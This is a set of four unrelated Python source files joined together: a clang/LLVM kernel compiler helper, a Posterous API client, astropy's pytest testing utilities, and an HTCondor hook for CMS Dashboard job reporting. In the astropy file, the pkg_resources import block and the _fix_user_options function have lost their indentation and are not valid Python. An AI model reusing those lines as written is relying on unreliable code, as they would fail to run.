    :param source: C++ source text appended to the standard header
        template.
    :raises RuntimeError: When clang reports a compilation error.
    """
    import tempfile, os, subprocess
    header = get_cpp_template()
    fid_cpp, name_cpp = tempfile.mkstemp(suffix='.cpp', text=True)
    try:
        os.write(fid_cpp, header + source)
        os.close(fid_cpp)
        args = ['clang','-S','-emit-llvm','-O3','-o','-',name_cpp]
        p1 = subprocess.Popen(args, stdout=subprocess.PIPE)
        assembly, err = p1.communicate()
        if err:
            raise RuntimeError("Error trying to compile", err)
    finally:
        # Always clean up the temporary source file; the original leaked
        # it when compilation failed.
        os.remove(name_cpp)
    llvm_module = Module.from_assembly(assembly)
    # Always get the first function ---
    # assume it is source
    # FIXME: We could improve this with an independent
    # parser of the source file
    func = llvm_module.functions[0]
    krnl = BlazeElementKernel(func)
    # Use default llvm dshapes --
    # could improve this with a parser of source
    return krnl
def fromctypes(func, module=None):
    """Create a kernel from a ctypes function.

    NOTE(review): unfinished -- after validating argtypes and optionally
    constructing a module name, it unconditionally raises
    NotImplementedError.
    """
    if func.argtypes is None:
        raise ValueError("ctypes function must have argtypes and restype set")
    if module is None:
        names = [arg.__name__ for arg in func.argtypes]
        names.append(func.restype.__name__)
        name = "mod__{0}_{1}".format(func.__name__, '_'.join(names))
        module = Module.new(name)
    raise NotImplementedError
def refresh_name(_llvmtype, module=None):
    """Re-create anonymous array-struct pointer types against ``module``
    so the type carries a usable name; all other types pass through
    unchanged.
    """
    if (_llvmtype.kind == lc.TYPE_POINTER and
        _llvmtype.pointee.kind == lc.TYPE_STRUCT and
        _llvmtype.pointee.name == ''):
        res = lla.check_array(_llvmtype.pointee)
        if res is None:
            # Anonymous struct that is not an array type; leave as-is.
            return _llvmtype
        kindnum, nd, eltype = res
        _llvmtype = lc.Type.pointer(array_type(nd, kindnum, eltype, module))
    return _llvmtype
|
|
# Copyright:
# Copyright (c) 2010, Benjamin Reitzammer <http://github.com/nureineide>,
# All rights reserved.
#
# License:
# This program is free software. You can distribute/modify this program under
# the terms of the Apache License Version 2.0 available at
# http://www.apache.org/licenses/LICENSE-2.0.txt
from datetime import datetime
from posterous.parsers import ModelParser
from posterous.bind import bind_method
from posterous.utils import *
class API(object):
    """Client for the Posterous web API.

    Each endpoint is declared once via ``bind_method``, which turns the
    declaration into a callable method on this class.

    Parameters
    ----------
    username, password : str, optional
        Credentials used for endpoints declared with ``require_auth=True``.
    host : str
        Base URL of the Posterous service.
    api_root : str
        Path prefix for API calls.
    parser : optional
        Response parser; defaults to ``ModelParser()``.
    """
    def __init__(self, username=None, password=None,
            host='https://posterous.com', api_root='/api', parser=None):
        self.username = username
        self.password = password
        self.host = host
        self.api_root = api_root
        self.parser = parser or ModelParser()
    ## API methods
    """
    Required arguments:
      'path' - The API method's URL path.
    The optional arguments available are:
      'method'        - The HTTP request method to use: "GET", "POST",
                        "DELETE" ... Defaults to "GET" if argument
                        is not provided.
      'payload_type'  - The name of the Model class that will retain and
                        parse the response data.
      'payload_list'  - If True, a list of 'payload_type' objects is returned.
      'response_type' - Determines which parser to use. Set to 'json' if the
                        response is in JSON format. Defaults to 'xml' if not
                        specified.
      'allowed_param' - A list of params that the API method accepts. Must be
                        formatted as a list of tuples, with the param name
                        being paired with the expected value type. If more
                        than one type is allowed, place the types in a tuple.
      'require_auth'  - True if the API method requires authentication.
    """
    ## API token
    """Returns the API token for the user"""
    get_api_token = bind_method(
        path = '2/auth/token',
        payload_type = 'apitoken',
        allowed_param = [],
        response_type = 'json',
        require_auth = True
    )
    ## Reading
    """
    Retrieve a site's posts
    """
    retrieve_posts = bind_method(
        path = '2/sites/site_id/posts',
        payload_type = 'postv2',
        payload_list = True,
        response_type = 'json',
        url_param = [('site_id', int)],
        allowed_param = [
            ('page', int),
            ('since_id', int),
            ('tag', basestring),
            ('api_token', basestring)],
        require_auth = True
    )
    """
    Retrieve a site's public posts
    """
    retrieve_public_posts = bind_method(
        path = '2/sites/site_id/posts/public',
        payload_type = 'postv2',
        payload_list = True,
        response_type = 'json',
        url_param = [('site_id', int)],
        allowed_param = [
            ('page', int),
            ('since_id', int),
            ('tag', basestring),
            ('api_token', basestring)],
        require_auth = False
    )
    """
    Returns a list of all sites owned and authored by the
    authenticated user.
    """
    get_sites = bind_method(
        path = 'getsites',
        payload_type = 'site',
        payload_list = True,
        allowed_param = [],
        require_auth = True
    )
    """
    Returns a list of posts. Authentication is optional.
    If it's not authenticated, either the site_id or hostname
    is required and only public posts will be returned.
    """
    read_posts = bind_method(
        path = 'readposts',
        payload_type = 'post',
        payload_list = True,
        allowed_param = [
            ('site_id', int),
            ('hostname', basestring),
            ('num_posts', int),
            ('page', int),
            ('tag', basestring)],
        require_auth = False
    )
    read_posts_v2 = bind_method(
        path = '2/users/me/sites/primary/posts',
        payload_type = 'postv2',
        payload_list = True,
        response_type = 'json',
        allowed_param = [
            ('page', int),
            ('since_id', int),
            ('tag', basestring),
            ('api_token', basestring)],
        require_auth = False
    )
    """
    Returns a post by interacting with the Post.ly API.
    The id param must be in Post.ly shortcode.
    (Example: 123abc in http://post.ly/123abc)
    Authentication is required if the post is private.
    """
    get_post = bind_method(
        path = 'getpost',
        payload_type = 'post',
        allowed_param = [('id', basestring)],
        require_auth = False
    )
    get_post_v2 = bind_method(
        path = '2/users/me/sites/primary/posts/id',
        payload_type = 'postv2',
        response_type = 'json',
        url_param = [('id', int)],
        allowed_param = [('api_token', basestring)],
        require_auth = False
    )
    """
    Returns a list of all post tags. Authentication is
    optional. If it's not authenticated, either the site_id or
    hostname is required and only tags in public posts/sites
    will be returned.
    """
    get_tags = bind_method(
        path = 'gettags',
        payload_type = 'tag',
        payload_list = True,
        allowed_param = [
            ('site_id', int),
            ('hostname', basestring)],
        require_auth = False
    )
    """
    Returns a list of all comments for a post. Authentication is
    optional.
    Uses Posterous API version 2.
    """
    get_comments_v2 = bind_method(
        path = '2/users/me/sites/primary/posts/id/responses',
        payload_type = 'commentv2',
        payload_list = True,
        response_type = 'json',
        url_param = [('id', int)],
        allowed_param = [('api_token', basestring)],
        require_auth = True
    )
    ## Posting
    """
    Creates a new post and returns a post object.
    The media param must be set to file data. If posting
    multiple files, provide a list of file data.
    """
    new_post = bind_method(
        path = 'newpost',
        method = 'POST',
        payload_type = 'post',
        allowed_param = [
            ('site_id', int),
            ('title', basestring),
            ('body', basestring),
            ('media', (basestring, list)),
            ('autopost', bool),
            ('private', bool),
            ('date', datetime),
            ('tags', basestring),
            ('source', basestring),
            ('sourceLink', basestring)],
        require_auth = True
    )
    """
    Returns an updated post.
    The media param must be set to file data. If posting
    multiple files, provide a list of file data.
    """
    update_post = bind_method(
        path = 'updatepost',
        method = 'POST',
        payload_type = 'post',
        allowed_param = [
            ('post_id', int),
            ('title', basestring),
            ('body', basestring),
            ('media', (basestring, list))],
        require_auth = True
    )
    """
    Returns a comment with its accompanying post.
    If a name is not provided, the authenticated user will
    own the comment. Optionally, a name and email may be
    provided to create an anonymous comment; only the site
    owner can do this.
    """
    new_comment = bind_method(
        path = 'newcomment',
        method = 'POST',
        payload_type = 'comment',
        allowed_param = [
            ('post_id', int),
            ('comment', basestring),
            ('name', basestring),
            ('email', basestring),
            ('date', datetime)],
        require_auth = True
    )
    ## Twitter
    """
    Allows the posting of media to Posterous using Twitter
    credentials. Username and password are required params.
    If the Twitter user is registered on Posterous, it will
    post to their default site. If not registered, Posterous
    will create a new site for them.
    The media param must be set to file data. If posting
    multiple files, provide a list of file data.
    Returns a JSON object with the post id and post url.
    """
    # BUGFIX: this declaration (and the one below) used the misspelled
    # keyword 'allowed_params'; every other endpoint uses 'allowed_param',
    # so the parameter list was being silently dropped.
    twitter_upload = bind_method(
        path = 'upload',
        method = 'POST',
        payload_type = 'json',
        response_type = 'json',
        allowed_param = [
            ('username', basestring),
            ('password', basestring),
            ('media', (basestring, list)),
            ('message', basestring),
            ('body', basestring),
            ('source', basestring),
            ('sourceLink', basestring)]
    )
    """
    Has the same functionality of 'twitter_upload', while
    also tweeting the message with a link.
    """
    twitter_upload_and_post = bind_method(
        path = 'uploadAndPost',
        method = 'POST',
        payload_type = 'json',
        response_type = 'json',
        allowed_param = [
            ('username', basestring),
            ('password', basestring),
            ('media', (basestring, list)),
            ('message', basestring),
            ('body', basestring),
            ('source', basestring),
            ('sourceLink', basestring)]
    )
|
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module provides the tools used to internally run the astropy test suite
from the installed astropy. It makes use of the `pytest` testing framework.
"""
import os
import sys
import types
import pickle
import warnings
import functools
import pytest
try:
# Import pkg_resources to prevent it from issuing warnings upon being
# imported from within pytest. See
# https://github.com/astropy/astropy/pull/537 for a detailed explanation.
import pkg_resources # pylint: disable=W0611 # noqa
except ImportError:
pass
from astropy.units import allclose as quantity_allclose # noqa
from astropy.utils.exceptions import (AstropyDeprecationWarning,
AstropyPendingDeprecationWarning)
# For backward-compatibility with affiliated packages
from .runner import TestRunner # pylint: disable=W0611 # noqa
# Explicit public API; kept stable for affiliated packages that import
# these helpers by name (or via ``import *``).
__all__ = ['raises', 'enable_deprecations_as_exceptions', 'remote_data',
           'treat_deprecations_as_exceptions', 'catch_warnings',
           'assert_follows_unicode_guidelines',
           'assert_quantity_allclose', 'check_pickling_recovery',
           'pickle_protocol', 'generic_recursive_equality_test']
# pytest marker to mark tests which get data from the web.
# This alias is being maintained for backwards compatibility only;
# new code should use ``pytest.mark.remote_data`` directly.
remote_data = pytest.mark.remote_data
# distutils expects options to be Unicode strings
def _fix_user_options(options):
def to_str_or_none(x):
if x is None:
return None
return str(x)
return [tuple(to_str_or_none(x) for x in y) for y in options]
def _save_coverage(cov, result, rootdir, testing_path):
    """
    This method is called after the tests have been run in coverage mode
    to cleanup and then save the coverage data and report.

    Parameters
    ----------
    cov : coverage.Coverage
        The active coverage object.
    result : int
        Exit status of the test run; nothing is saved unless it is 0.
    rootdir : str
        Directory the rewritten source paths should be rooted at, and
        where the HTML report is written.
    testing_path : str
        Temporary directory the tests actually ran from; stripped from
        the recorded file paths.
    """
    from astropy.utils.console import color_print
    if result != 0:
        # Tests failed -- do not persist coverage for a broken run.
        return
    # The coverage report includes the full path to the temporary
    # directory, so we replace all the paths with the true source
    # path. Note that this will not work properly for packages that still
    # rely on 2to3.
    try:
        # Coverage 4.0: _harvest_data has been renamed to get_data, the
        # lines dict is private
        cov.get_data()
    except AttributeError:
        # Coverage < 4.0
        cov._harvest_data()
        lines = cov.data.lines
    else:
        lines = cov.data._lines
    # Re-key every recorded file from its temporary location to the
    # corresponding path under ``rootdir``.
    for key in list(lines.keys()):
        new_path = os.path.relpath(
            os.path.realpath(key),
            os.path.realpath(testing_path))
        new_path = os.path.abspath(
            os.path.join(rootdir, new_path))
        lines[new_path] = lines.pop(key)
    color_print('Saving coverage data in .coverage...', 'green')
    cov.save()
    color_print('Saving HTML coverage report in htmlcov...', 'green')
    cov.html_report(directory=os.path.join(rootdir, 'htmlcov'))
# TODO: Plan a roadmap of deprecation as pytest.raises has matured over the years.
# See https://github.com/astropy/astropy/issues/6761
class raises:
    """
    A decorator to mark that a test should raise a given exception.
    Use as follows::
        @raises(ZeroDivisionError)
        def test_foo():
            x = 1/0
    This can also be used a context manager, in which case it is just
    an alias for the ``pytest.raises`` context manager (because the
    two have the same name this help avoid confusion by being
    flexible).
    .. note:: Usage of ``pytest.raises`` is preferred.
    """
    # pep-8 naming exception -- this is a decorator class
    def __init__(self, exc):
        # Exception type the decorated test is expected to raise.
        self._exc = exc
        # Lazily-created pytest.raises context (context-manager use only).
        self._ctx = None
    def __call__(self, func):
        # Decorator form: wrap the test so pytest.raises asserts that
        # calling it raises ``self._exc``.
        @functools.wraps(func)
        def run_raises_test(*args, **kwargs):
            pytest.raises(self._exc, func, *args, **kwargs)
        return run_raises_test
    def __enter__(self):
        # Context-manager form: delegate directly to pytest.raises.
        self._ctx = pytest.raises(self._exc)
        return self._ctx.__enter__()
    def __exit__(self, *exc_info):
        return self._ctx.__exit__(*exc_info)
# Module-level switches controlled by ``enable_deprecations_as_exceptions``
# and consumed by ``treat_deprecations_as_exceptions``.
_deprecations_as_exceptions = False
_include_astropy_deprecations = True
# Modules that emit deprecation warnings at import time; they are imported
# once with warnings suppressed before deprecations become errors.
_modules_to_ignore_on_import = set([
    r'compiler',  # A deprecated stdlib module used by pytest
    r'scipy',
    r'pygments',
    r'ipykernel',
    r'IPython',  # deprecation warnings for async and await
    r'setuptools'])
# Modules whose deprecation warnings are ignored entirely (not just on
# import); empty by default, extended by affiliated packages.
_warnings_to_ignore_entire_module = set([])
# Map of Python version tuple (or None for version-agnostic) to a set of
# (message-regex, warning-class) pairs that are always ignored.
_warnings_to_ignore_by_pyver = {
    None: set([  # Python version agnostic
        # https://github.com/astropy/astropy/pull/7372
        (r"Importing from numpy\.testing\.decorators is deprecated, "
         r"import from numpy\.testing instead\.", DeprecationWarning),
        # inspect raises this slightly different warning on Python 3.7.
        # Keeping it since e.g. lxml as of 3.8.0 is still calling getargspec()
        (r"inspect\.getargspec\(\) is deprecated, use "
         r"inspect\.signature\(\) or inspect\.getfullargspec\(\)",
         DeprecationWarning),
        # https://github.com/astropy/pytest-doctestplus/issues/29
        (r"split\(\) requires a non-empty pattern match", FutureWarning),
        # Package resolution warning that we can do nothing about
        (r"can't resolve package from __spec__ or __package__, "
         r"falling back on __name__ and __path__", ImportWarning)]),
    (3, 7): set([
        # Deprecation warning for collections.abc, fixed in Astropy but still
        # used in lxml, and maybe others
        (r"Using or importing the ABCs from 'collections'",
         DeprecationWarning)])
}
def enable_deprecations_as_exceptions(include_astropy_deprecations=True,
                                      modules_to_ignore_on_import=[],
                                      warnings_to_ignore_entire_module=[],
                                      warnings_to_ignore_by_pyver={}):
    """
    Turn on the feature that turns deprecations into exceptions.

    Parameters
    ----------
    include_astropy_deprecations : bool
        If `True`, ``AstropyDeprecationWarning`` and
        ``AstropyPendingDeprecationWarning`` are also turned into
        exceptions.
    modules_to_ignore_on_import : list of str
        Extra modules whose import-time deprecation warnings should be
        ignored, in addition to the defaults (``compiler``, ``scipy``,
        ``pygments``, ``ipykernel``, ``setuptools``, ...).
    warnings_to_ignore_entire_module : list of str
        Modules whose deprecation warnings are ignored completely, not
        just at import time. With ``include_astropy_deprecations=True``
        the astropy deprecation classes are ignored for them as well.
    warnings_to_ignore_by_pyver : dict
        Maps a ``(major, minor)`` Python version tuple (or `None` for
        version-agnostic entries) to an iterable of
        ``(warning_message, warning_class)`` pairs to ignore, merged into
        the module-level defaults.
    """
    global _deprecations_as_exceptions
    global _include_astropy_deprecations
    global _modules_to_ignore_on_import
    global _warnings_to_ignore_entire_module
    global _warnings_to_ignore_by_pyver

    _deprecations_as_exceptions = True
    _include_astropy_deprecations = include_astropy_deprecations
    _modules_to_ignore_on_import.update(modules_to_ignore_on_import)
    _warnings_to_ignore_entire_module.update(warnings_to_ignore_entire_module)
    # Merge per-version entries into any existing sets rather than replace.
    for version, entries in warnings_to_ignore_by_pyver.items():
        _warnings_to_ignore_by_pyver.setdefault(version, set()).update(entries)
def treat_deprecations_as_exceptions():
    """
    Turn all DeprecationWarnings (which indicate deprecated uses of
    Python itself or Numpy, but not within Astropy, where we use our
    own deprecation warning class) into exceptions so that we find
    out about them early.
    This completely resets the warning filters and any "already seen"
    warning state.
    """
    # First, totally reset the warning state. The modules may change during
    # this iteration thus we copy the original state to a list to iterate
    # on. See https://github.com/astropy/astropy/pull/5513.
    for module in list(sys.modules.values()):
        # We don't want to deal with six.MovedModules, only "real"
        # modules. FIXME: we no more use six, this should be useless ?
        if (isinstance(module, types.ModuleType) and
                hasattr(module, '__warningregistry__')):
            del module.__warningregistry__
    if not _deprecations_as_exceptions:
        # Feature not enabled (see enable_deprecations_as_exceptions);
        # only the registry reset above is performed.
        return
    warnings.resetwarnings()
    # Hide the next couple of DeprecationWarnings
    warnings.simplefilter('ignore', DeprecationWarning)
    # Here's the wrinkle: a couple of our third-party dependencies
    # (pytest and scipy) are still using deprecated features
    # themselves, and we'd like to ignore those. Fortunately, those
    # show up only at import time, so if we import those things *now*,
    # before we turn the warnings into exceptions, we're golden.
    for m in _modules_to_ignore_on_import:
        try:
            __import__(m)
        except ImportError:
            # The module simply is not installed; nothing to suppress.
            pass
    # Now, start over again with the warning filters
    warnings.resetwarnings()
    # Now, turn these warnings into exceptions
    _all_warns = [DeprecationWarning, FutureWarning, ImportWarning]
    # Only turn astropy deprecation warnings into exceptions if requested
    if _include_astropy_deprecations:
        _all_warns += [AstropyDeprecationWarning,
                       AstropyPendingDeprecationWarning]
    for w in _all_warns:
        warnings.filterwarnings("error", ".*", w)
    # This ignores all specified warnings from given module(s),
    # not just on import, for use of Astropy affiliated packages.
    for m in _warnings_to_ignore_entire_module:
        for w in _all_warns:
            warnings.filterwarnings('ignore', category=w, module=m)
    # This ignores only specified warnings by Python version, if applicable.
    for v in _warnings_to_ignore_by_pyver:
        if v is None or sys.version_info[:2] == v:
            for s in _warnings_to_ignore_by_pyver[v]:
                # s is a (message-regex, warning-class) pair.
                warnings.filterwarnings("ignore", s[0], s[1])
    # If using Matplotlib < 3, we should ignore the following warning since
    # this is beyond our control
    try:
        import matplotlib
    except ImportError:
        pass
    else:
        # NOTE: string comparison of the first version character --
        # sufficient for distinguishing major version 1/2 from 3.
        if matplotlib.__version__[0] < '3':
            warnings.filterwarnings('ignore', category=DeprecationWarning,
                                    module='numpy.lib.type_check')
# TODO: Plan a roadmap of deprecation as pytest.warns has matured over the years.
# See https://github.com/astropy/astropy/issues/6761
class catch_warnings(warnings.catch_warnings):
    """
    A high-powered version of warnings.catch_warnings to use for testing
    and to make sure that there is no dependence on the order in which
    the tests are run.

    This completely blitzes any memory of any warnings that have
    appeared before so that all warnings will be caught and displayed.

    ``*classes`` is a set of warning classes to collect. If no classes
    are provided, all warnings are collected.

    Use as follows::

        with catch_warnings(MyCustomWarning) as w:
            do.something.bad()
        assert len(w) > 0

    .. note:: Usage of :ref:`pytest.warns <pytest:warns>` is preferred.
    """

    def __init__(self, *classes):
        super().__init__(record=True)
        self.classes = classes

    def __enter__(self):
        recorded = super().__enter__()
        # Reset all warning state so earlier tests cannot influence what
        # gets recorded here.
        treat_deprecations_as_exceptions()
        if self.classes:
            # Only the requested classes are recorded; everything else
            # is suppressed.
            warnings.simplefilter('ignore')
            for warning_class in self.classes:
                warnings.simplefilter('always', warning_class)
        else:
            warnings.simplefilter('always')
        return recorded

    def __exit__(self, type, value, traceback):
        # Restore the exception-raising filters on the way out.
        treat_deprecations_as_exceptions()
class ignore_warnings(catch_warnings):
    """
    Context manager / function decorator that silences all warnings raised
    inside the wrapped block or function.

    An optional ``category`` may be given to ignore only warnings of that
    category (or categories, if a list is provided); otherwise every
    warning is ignored.
    """

    def __init__(self, category=None):
        super().__init__()
        # Normalize a single Warning subclass to a one-element list so
        # __enter__ can always iterate.
        if isinstance(category, type) and issubclass(category, Warning):
            self.category = [category]
        else:
            self.category = category

    def __call__(self, func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            # A fresh context-manager instance is created per call; reusing
            # ``self`` would break if the function is invoked repeatedly.
            with self.__class__(category=self.category):
                return func(*args, **kwargs)
        return wrapper

    def __enter__(self):
        retval = super().__enter__()
        if self.category is None:
            warnings.simplefilter('ignore')
        else:
            for warning_category in self.category:
                warnings.simplefilter('ignore', warning_category)
        return retval
def assert_follows_unicode_guidelines(
        x, roundtrip=None):
    """
    Test that an object follows our Unicode policy. See
    "Unicode guidelines" in the coding guidelines.

    Parameters
    ----------
    x : object
        The instance to test
    roundtrip : module, optional
        When provided, this namespace will be used to evaluate
        ``repr(x)`` and ensure that it roundtrips. It will also
        ensure that ``__bytes__(x)`` roundtrip.
        If not provided, no roundtrip testing will be performed.
    """
    from astropy import conf
    # First pass: with unicode_output disabled, every textual form of the
    # object must be pure ASCII.
    with conf.set_temp('unicode_output', False):
        bytes_x = bytes(x)
        unicode_x = str(x)
        repr_x = repr(x)
        assert isinstance(bytes_x, bytes)
        bytes_x.decode('ascii')  # raises UnicodeDecodeError on non-ASCII
        assert isinstance(unicode_x, str)
        unicode_x.encode('ascii')  # raises UnicodeEncodeError on non-ASCII
        assert isinstance(repr_x, str)
        if isinstance(repr_x, bytes):
            repr_x.decode('ascii')
        else:
            repr_x.encode('ascii')
        if roundtrip is not None:
            assert x.__class__(bytes_x) == x
            assert x.__class__(unicode_x) == x
            assert eval(repr_x, roundtrip) == x
    # Second pass: with unicode_output enabled, str() may contain
    # non-ASCII, but bytes() must still decode as ASCII.
    with conf.set_temp('unicode_output', True):
        bytes_x = bytes(x)
        unicode_x = str(x)
        repr_x = repr(x)
        assert isinstance(bytes_x, bytes)
        bytes_x.decode('ascii')
        assert isinstance(unicode_x, str)
        assert isinstance(repr_x, str)
        if isinstance(repr_x, bytes):
            repr_x.decode('ascii')
        else:
            repr_x.encode('ascii')
        if roundtrip is not None:
            assert x.__class__(bytes_x) == x
            assert x.__class__(unicode_x) == x
            assert eval(repr_x, roundtrip) == x
@pytest.fixture(params=[0, 1, -1])
def pickle_protocol(request):
    """
    Fixture to run all the tests for protocols 0 and 1, and -1 (most advanced).
    (Originally from astropy.table.tests.test_pickle)
    """
    # Each test using this fixture is parametrized over the three protocols.
    return request.param
def generic_recursive_equality_test(a, b, class_history):
    """Assert that ``a`` and ``b`` carry equal instance attributes.

    Every key in ``a.__dict__`` must also exist in ``b.__dict__`` and
    compare equal (element-wise for iterable comparison results, e.g.
    numpy arrays). Attribute values that themselves have a ``__dict__``
    are compared recursively; ``class_history`` lists the classes already
    visited on this path and is used to break recursion cycles.
    """
    attrs_a = a.__dict__
    attrs_b = b.__dict__
    for name, value in attrs_a.items():
        assert name in attrs_b,\
            f"Did not pickle {name}"
        if hasattr(value, '__eq__'):
            comparison = (value == attrs_b[name])
            if '__iter__' in dir(comparison):
                # Element-wise comparison result (e.g. an ndarray):
                # equal only if no element compared False.
                comparison = (False not in comparison)
            assert comparison, f"Value of {name} changed by pickling"
        if hasattr(value, '__dict__'):
            if value.__class__ in class_history:
                # Attempt to prevent infinite recursion through cycles.
                pass
            else:
                generic_recursive_equality_test(
                    value, attrs_b[name],
                    [value.__class__] + list(class_history))
def check_pickling_recovery(original, protocol):
    """Round-trip *original* through pickle at *protocol* and verify that
    its instance attributes survive serialization (recursively, via
    ``generic_recursive_equality_test``).
    """
    serialized = pickle.dumps(original, protocol=protocol)
    restored = pickle.loads(serialized)
    generic_recursive_equality_test(original, restored,
                                    [original.__class__])
def assert_quantity_allclose(actual, desired, rtol=1.e-7, atol=None,
                             **kwargs):
    """
    Raise an assertion if two objects are not equal up to desired tolerance.

    This is a :class:`~astropy.units.Quantity`-aware version of
    :func:`numpy.testing.assert_allclose`: units are stripped into
    consistent plain arrays before the numerical comparison.
    """
    import numpy as np
    from astropy.units.quantity import _unquantify_allclose_arguments
    unitless_args = _unquantify_allclose_arguments(actual, desired,
                                                   rtol, atol)
    np.testing.assert_allclose(*unitless_args, **kwargs)
|
|
import os
import sys
import datetime
from hashlib import sha1
import subprocess
import getpass
import htcondor
import re
sys.path.insert(0, '/cvmfs/cms.cern.ch/crab/CRAB_2_11_1_patch1/python/')
from DashboardAPI import apmonSend, apmonFree
# import DashboardAPI
# DashboardAPI.apmonLoggingLevel = "DEBUG"
class cmsdashboard(hook):
    """Submit-tool plugin hook that enables CMS Dashboard reporting.

    NOTE(review): written for Python 2 (the sibling classes use print
    statements); ``hook`` is provided by the host submission framework.
    """
    debug = True
    def options(self, *args, **kwargs):
        """Consume the ``--disable-dashboard`` flag from the command-line
        argument list (``args[0]``), setting ``self.use_dashboard``
        accordingly and stripping the flag so it is not passed on."""
        self.use_dashboard = True
        if args:
            # command line args are only the first argument to this function
            clargs = list(args[0])
            nargs = []
            for arg in clargs:
                if arg == '--disable-dashboard':
                    self.use_dashboard = False
                    continue
                nargs.append(arg)
            # Replace elements of the original arg list. The [:] is
            # important. (This is a bit of a cheat around the fact
            # that we can't return args from the hook.)
            args[0][:] = nargs
    def presubmit(self, job, *args, **kwargs):
        """Create a CMSReporter for the job's first (submit) file.

        NOTE(review): the reporter is constructed but not stored or used
        here -- presumably registration side effects in CMSReporter's
        constructor are the point; confirm against the host framework.
        """
        reporter = CMSReporter(job.files[0])
class CMSReporter(object):
    """Rewrites an HTCondor submit description to route jobs through the
    CMS Dashboard wrapper and reports job status to the Dashboard.

    Python 2 code (print statements). ``sub`` arguments below are
    list-like submit objects of (key, value) tuples provided by the
    host condor_submit wrapper.
    """
    def __init__(self, submitfile):
        self._submitfile = submitfile
        # When True, report_jobs/cms_dashboard_report become no-ops.
        self._cancel_report = False
        # Wrapper executed on the worker node in place of the user's
        # executable; the original executable becomes its first argument.
        self._wrapper = '/home/khurtado/CMSConnect/dashboard/connect_wrapper.py'
        # Create and register monitor
        self._taskid = self._get_taskid(str(submitfile))
        self.monitor = Monitor(self._taskid)
    def _preppend_to_item_values(self, sub, key, value, separator=' '):
        '''Search for all coincidences of a key in the submit class
        and preppend 'value' to its contents.
        '''
        index = 0
        for item in sub:
            # Case-insensitive substring match on the attribute name.
            if key.lower() in item[0].lower():
                item = (item[0], '{0}{1}{2}'.format(value, separator, item[1]))
                # Use list.__setitem__ directly to bypass any custom
                # __setitem__ the submit class may define.
                list.__setitem__(sub, index, item)
            index += 1
    def _search_key_values(self, sub, key):
        '''Search for all coincidences of a key in the submit class.
        Returns a list with each key position
        '''
        index = 0
        key_map = []
        for item in sub:
            if key.lower() in item[0].lower():
                key_map.append(index)
            index += 1
        return key_map
    def _split_by_exe_blocks(self, sub):
        '''Partition the submit list into sublists, one per "executable"
        entry (the first block starts at index 0 regardless).'''
        # Ignore first executable position
        blocks = [0] + self._search_key_values(sub, 'executable')[1:] + [len(sub)]
        sublists = []
        for i in range(len(blocks) - 1):
            sublists += [sub[blocks[i]:blocks[i + 1]]]
        return sublists
    def _modify_exe_args(self, sub):
        '''Return a copy of a modified submit object. Modifications are:
        -Replace 'Executables' for 'connect_wrapper.py'
        -Preppend the original executable to arguments
        -Create one if there are no arguments
        -Add executable to transfer_input_files
        -Create one if there is no such attribute
        -Do this per executable block
        '''
        newsub = sub.__class__()
        # Remembers the last seen transfer_input_files value so later
        # executable blocks without one inherit it.
        latest_transfer_input_files = ''
        for sublist in self._split_by_exe_blocks(sub):
            sublist = sub.__class__(sublist)
            Executable = True if 'executable' in sublist else False
            if Executable:
                exe_index = int(sublist.index(sublist['executable']))
                exe_cmd = sublist['executable'][1]
                # Swap in the dashboard wrapper as the actual executable.
                sublist['executable'] = self._wrapper
                # Update arguments
                if 'arguments' in sublist:
                    self._preppend_to_item_values(sublist, 'arguments', exe_cmd)
                else:
                    # sublist['arguments'] = exe_cmd
                    sublist.insert(exe_index + 1, ('Arguments', exe_cmd))
                # Update transfer_input_files
                if 'transfer_input_files' in sublist:
                    latest_transfer_input_files = sublist['transfer_input_files'][1]
                    self._preppend_to_item_values(sublist, 'transfer_input_files', exe_cmd, ',')
                else:
                    if latest_transfer_input_files:
                        sublist.insert(exe_index + 1,
                                       ('transfer_input_files', '{0},{1}'.format(exe_cmd, latest_transfer_input_files)))
                    else:
                        sublist.insert(exe_index + 1, ('transfer_input_files', exe_cmd))
            newsub.extend(sublist)
        newsub.update()
        return newsub
    def _get_taskid(self, jdl_name):
        """Build a unique dashboard task id from the user name, the submit
        file's basename and a timestamp-derived hash suffix."""
        filename = os.path.splitext(jdl_name)[0]
        taskid = 'cmsconnect_{0}_{1}_{2}'.format(getpass.getuser(), filename,
                 sha1(str(datetime.datetime.utcnow())).hexdigest()[-16:])
        return taskid
    def _cluster_jobs(self, output):
        """Parse condor_submit output and return a list of
        (cluster_id, job_count) string pairs."""
        cluster_jobs = []
        cluster_re = re.compile(r'(\d+) job\(s\) submitted to cluster (\d+)\.')
        for line in output.split("\n"):
            match = cluster_re.match(line)
            if match:
                # group(2) is the cluster id, group(1) the job count.
                cluster_jobs.append((match.group(2), match.group(1)))
        return cluster_jobs
    def report_jobs(self, condor_output):
        """Tag each submitted job with a Dashboard_Id via schedd.edit and
        report every job to the Dashboard as Pending."""
        if self._cancel_report:
            return
        clusters = self._cluster_jobs(condor_output)
        if not clusters:
            print "Warning: Could not extract clusters and jobs submitted information."
            return
        jobs_previous = 0
        schedd = htcondor.Schedd()
        for cluster, jobs in clusters:
            for procid in range(int(jobs)):
                # Dashboard ids are sequential across all clusters.
                new_id = str(int(jobs_previous) + int(procid))
                schedd.edit(['{0}.{1}'.format(cluster, procid)], 'Dashboard_Id', new_id)
                schedd.edit(['{0}.{1}'.format(cluster, procid)], 'Environment',
                            "\"{0} Dashboard_Id='{1}'\"".format(self.monitor.environment, new_id))
            jobs_previous += int(jobs)
        # Report jobs
        njobs = jobs_previous
        for id in range(0, int(njobs)):
            self.monitor.register_job(str(id))
        self.monitor.free()
        for id in range(0, int(njobs)):
            self.monitor.update_job(str(id), 'Pending')
        return
    def cms_dashboard_report(self, sub, classads, nargs):
        ''' - Register jobs to monitor(s).
        - One monitor per Executable
        - Add dashboard parameters to Classads and SHELL environment.
        - Preppend dashboard wrapper before executable for the worker node.
        Inputs:
        -sub: This is the submit jdl file interpreted by the condor_submit::submit
        class and passed as an object.
        -submitfile: Is the condor submit filename.
        -classads: Condor ClassAds to modify.
        -nargs: Arguments parsed to condor from condor_submit wrapper.
        '''
        original_sub = sub
        sub = sub.__class__(self._modify_exe_args(sub))
        if sub:
            sub.update()
        else:
            print """Warning: Could not append dashboard wrapper to submit file.
            Stop CMS dashboard reporting"""
            self._cancel_report = True
            return original_sub
        # Create and register monitor
        self.monitor.set_executable(sub['executable'][1])
        self.monitor.register_run()
        dashboard_monitorid, dashboard_syncid = self.monitor.generate_ids('MetaID')
